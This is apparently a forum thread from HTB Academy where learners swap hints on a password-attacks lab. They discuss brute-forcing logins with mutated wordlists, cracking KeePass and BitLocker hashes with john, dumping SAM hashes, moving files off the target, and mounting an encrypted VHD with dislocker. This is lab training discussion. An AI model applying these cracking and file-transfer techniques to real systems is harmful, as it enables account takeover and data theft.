Password Attacks Lab - Hard

HTB Content Academy
43

If you’re using evil-winrm you can try the download command.
Otherwise you can make use of some PowerShell like so :

$wc = New-Object Net.WebClient
$download = $wc.upload(your server, absolute path of the file you wanna transfer)

This is from memory so I might have the syntax wrong but you’ve got the idea. More details here : https://learn.microsoft.com/fr-fr/dotnet/api/system.net.webclient.uploadfile?view=netframework-4.8#system-net-webclient-uploadfile(system-uri-system-string)

Also on some Windows machine curl is installed, you can use it to make a POST request to your server.

45

I was able to crack the Logins.kdbx file with john. Tried to get the password with user D**** to log in, without success. Have the password mut, also without success. How can I use the cracked password of Logins.kdbx, for what?

48

Hello.
I have been stuck on this module for a long time.
I am trying to find Johnna’s password in total with mutated passwords and tools, but I can’t find it.

I am using the following command
Spoiler warning.

Can someone give me a hint?
(Update) I got password

49

stuck in the same place

50

I used the full path to my mutated password list and it worked.

Crackmapexec with the smb flag

51

Hello.
I am stuck again.
When I try to decrypt a vhd file, it asks for a password as follows.

$ sudo cryptsetup bitlkOpen /dev/nbd0p2 my_label
Enter passphrase for /dev/nbd0p2:.

But I don’t know what this password refers to …
What is the password used for this?
I need some hints.

52

Stuck on the Administrator password. I used samdump2 to get the hashes but they are all the same in my output. I was able to crack it but it’s unusually blank if you know what I mean. I try xfreedrp and get a logon failure as well as with evil-rm

Update: Finally got the right hash from the SAM file using secrets dump and was able to get the flag.

53

You’ll need to crack the hash for it. Look into Bitlocker to John type of command to get the hash.

1 Like
54

did it but unfortunately I can not mount it following the instructions even if the pass I cracked is correct. It is a GPT partition

55

I cracked Administrator’s password, but I can not login Administrator…
How do it?

1 Like
56

how did you mount the Backup.vhd file. I have tried everything I can think of.

1 Like
57

the Backup.vhd is unable to mount using the guestmount tool although I have the correct passphrase
any hint or help would be appreciated

1 Like
58

im also stuck with the vhd file :frowning:
dont know how to mount it or use it to finish the module (is it relevant for the final flag?)
any hint would be appreciated

59

Got it!
My bad: didnt let the vhd file finished completely to download ( so it was corrupted :frowning: )
Thought it was intentional - blame on me!

60

@xenotim What method did you use to download the vhd file?

I swapped to a power shell terminal as david, but unsure how to login as david or move that file to my kali vm, any tips?

it sucks im wasting so much time trying to just download a file from this xfreerdp to my kali local. Pretty annoying. Guarantee I finish this box in a fraction of the time its taking me to just figure out how to download this file to my kali vm

EDIT: smbclient ftw

Now stuck with the others on what to do with the ntlm hash that was cracked. None of the PtH techniques are working

61

The easier option is mount in a windows machine with bitlocker support. I used a windows server virtual machine and it worked like a charm. Note: You will need the pass… :wink:

1 Like
62

I’m stuck with the initial brute-force using both hydra, CME, and crowbar with the johanna user and mutated password list. I’ve tried multiple versions, mutating the passworld.list file and nothing. Just need a hint for syntax or similar. Anyone else on the “struggle bus?”

64

Try again with CME and the mutated password list.

1 Like
65

For those struggling to mount a drive, and the guide shared by @god_f3lla does not yield results to you (reporting “Failed to set NBD socket”), this is what worked for me:

sudo mkdir /media/backup_bitlocker /media/mount
sudo losetup -P /dev/loop100 <your_file.vhd>
sudo dislocker -v -V /dev/loop100p2 -u -- /media/backup_bitlocker
sudo mount -o loop,rw /media/backup_bitlocker/dislocker-file /media/mount
ls -la /media/mount

Hope this saves you from wasting at least a couple of hours :slightly_smiling_face:

9 Likes
66

I am tired brute-forcing this guy account, please someone give me the first letter of his password or the length of the password so I can minimize this huge file.